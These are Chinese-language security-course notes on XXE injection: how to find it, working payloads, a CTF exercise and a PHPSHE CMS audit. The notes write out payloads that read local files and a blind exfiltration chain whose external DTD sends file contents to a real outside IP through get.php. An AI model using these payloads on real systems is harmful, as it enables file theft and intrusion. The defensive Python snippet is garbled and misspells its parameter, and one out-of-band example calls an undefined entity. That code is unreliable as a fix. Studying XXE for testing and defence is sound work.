#知识点:
1、XML&XXE-原理&发现&利用&修复等
2、XML&XXE-黑盒模式下的发现与利用
3、XML&XXE-白盒模式下的审计与利用
4、XML&XXE-无回显&伪协议&产生层面
#思路点:
参考:https://www.cnblogs.com/20175211lyz/p/11413335.html
-XXE 黑盒发现:
1、获取得到 Content-Type 或数据类型为 xml 时,尝试进行 xml 语言 payload 进行测试
2、不管获取的 Content-Type 类型或数据传输类型,均可尝试修改后提交测试 xxe
3、XXE 不仅在数据传输上可能存在漏洞,同样在文件上传引用插件解析或预览也会造成
文件中的 XXE Payload 被执行
-XXE 白盒发现: ——针对于xml的相关函数搜索,会增加查找XXE漏洞
1、可通过应用功能追踪代码定位审计
2、可通过脚本特定函数搜索定位审计
3、可通过伪协议玩法绕过相关修复等
#详细点:
XML 被设计为传输和存储数据,XML 文档结构包括 XML 声明、DTD 文档类型定义(可
选)、文档元素,其焦点是数据的内容,其把数据从 HTML 分离,是独立于软件和硬件的
信息传输工具。
XXE 漏洞全称 XML External Entity Injection,即 xml 外部实体注入漏洞,XXE 漏洞发生在应用程序解析 XML 输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站等危害。
XML 与 HTML 的主要差异:
XML 被设计为传输和存储数据,其焦点是数据的内容。
HTML 被设计用来显示数据,其焦点是数据的外观。
HTML 旨在显示信息 ,而 XML 旨在传输信息。
XXE 修复防御方案:
-方案 1-禁用外部实体
PHP:
libxml_disable_entity_loader(true);
JAVA:
DocumentBuilderFactory dbf
=DocumentBuilderFactory.newInstance();dbf.setExpandEntityReferenc
es(false);
Python:
From lxml.import etreexmlData =
Etree.parse(xmlSource.etree.XMLParser(resolve_entitles=False))
方案2-过滤用户提交的XML数据:
过滤关键词:<!DOCTYPE>和<!ENTITY>,或者SYSTEM和PUBLIC
Ø XML&XXE-黑盒-原理&探针&利用&玩法等
Ø XML&XXE-前端-CTF&Jarvisoj&探针&利用
Ø XML&XXE-白盒-CMS&PHPSHE&无回显审计
#XML&XXE-黑盒-原理&探针&利用&玩法等
辨别xml和html的数据包:
Xml:php_xxe
Html:
对xml进行分析
通过数据包进行白盒分析 doLogin.php
分析loadXML函数
同时,也能判断出此网页会对解析后的代码进行回显,那此时如果我们对其加入恶意代码让其进行执行,那可以实现:
1、读取文件:
<?xml version="1.0"?>
<!DOCTYPE Mikasa [
<!ENTITY test SYSTEM "file:///d:/e.txt">
]>
<user><username>&test;</username><password>Mikasa</password></use
r>
读取到本地D盘e.txt的文件内容
1.1、带外测试:
指内部服务器能通过某漏洞,将数据外带到外部域名中 DNSLog Platform
<?xml version="1.0" ?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "http://9v57ll.dnslog.cn">
%file;
]>
<user><username>&send;</username><password>Mikasa</password></use
r>
收到了内部的IP情况
因此,可以从到无回显的网页中,排去无回显的其他原因(代码写错、网络问题、没有漏洞等情况),当工具网页中,出现了来自内部的iP,则说明XXE漏洞存在,只是不回显数据
2.外部引用实体(有回显) dtd:
利用远程地址让远程地址中的文件evil2.dtd 执行恶意代码
解决了数据拦截防护过滤的问题
<?xml version="1.0" ?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "http://127.0.0.1:8081/evil2.dtd">
%file;
]>
<user><username>&send;</username><password>Mikasa</password></use
r>
evil2.dtd
<!ENTITY send SYSTEM "file:///d:/e.txt">
3.无回显读文件
将读取到的文件信息,保存到指定地址中,并让本地接收的文件写入get.php,对读取的文件信息进行收集保存到本地file.txt
Payload:
<?xml version="1.0"?>
<!DOCTYPE ANY[
<!ENTITY % file SYSTEM "file:///d:/e.txt">
<!ENTITY % remote SYSTEM "http://47.94.236.117/test.dtd">
%remote;
%all;
]>
<root>&send;</root>
test.dtd
<!ENTITY % all "<!ENTITY send SYSTEM
'http://47.94.236.117/get.php?file=%file;'>">
Get.php
4、其他玩法(协议)-见参考地址
#XML&XXE-前端-CTF&Jarvisoj&探针&利用
http://web.jarvisoj.com:9882/
通过数据包分析,它是以json形式
但是我们通过查看源代码,得知关键的信息
可以得知它其实是做了二次处理的,将第一次的数据为xml,然后进行json处理
所以输入payload,并修改type值:将json改为xml
<?xml version="1.0"?>
<!DOCTYPE ANY [
<!ENTITY test SYSTEM "file:///home/ctf/flag.txt">
]>
<x>&test;</x>
#XML&XXE-白盒-CMS&PHPSHE&无回显审计
-XXE 白盒发现: ——针对于xml的相关函数搜索,会增加查找XXE漏洞
1、可通过应用功能追踪代码定位审计
2、可通过脚本特定函数搜索定位审计
3、可通过伪协议玩法绕过相关修复等
simplexml_load_string
内容确定,得知此函数是在一个函数里面,所以我们要去看看谁调用了这个函数
pe_getxmlpe_getxml
同理,继续看谁调用函数wechat_getxml
找到了notify_url.php,对其进行网页安全测试
Payload:
<?xml version="1.0"?>
<!DOCTYPE ANY [
<!ENTITY test SYSTEM "file:///d:/1.txt">
]>
<x>&test;</x>
发现没有回显出数据来
所以用外带来进行确认漏洞是否存在
出现ip回显,则说明确实存在XXE
所以直接判定为无回显的XXE漏洞:
分析代码:输出的地方没有设计到变量,所以没有数据是合理的
那就远程读取文件,将文件进行保存,再用get.php进行读取,存入file.txt文件,获取相关内容
